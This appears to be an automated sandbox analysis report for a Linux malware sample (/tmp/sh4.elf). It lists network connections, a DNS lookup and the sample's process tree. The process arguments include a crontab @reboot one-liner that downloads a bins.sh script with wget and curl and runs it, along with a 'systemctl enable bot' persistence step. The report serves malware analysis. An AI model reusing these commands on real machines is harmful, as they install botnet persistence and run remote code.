Nov 20, 2024 01:03:23.166596889 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:23.166702032 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:23.171529055 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:28.162317991 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:28.162523985 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:28.167479992 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:28.167586088 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:28.172466040 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:32.490186930 CET | 41822 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 01:01:32.654469967 CET | 53 | 41822 | 1.1.1.1 | 192.168.2.23 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:32.490186930 CET | 192.168.2.23 | 1.1.1.1 | 0xe89e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:32.654469967 CET | 1.1.1.1 | 192.168.2.23 | 0xe89e | No error (0) | 172.111.38.48 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 00:01:27 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | /tmp/sh4.elf |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:27 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:27 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:32 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/sh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |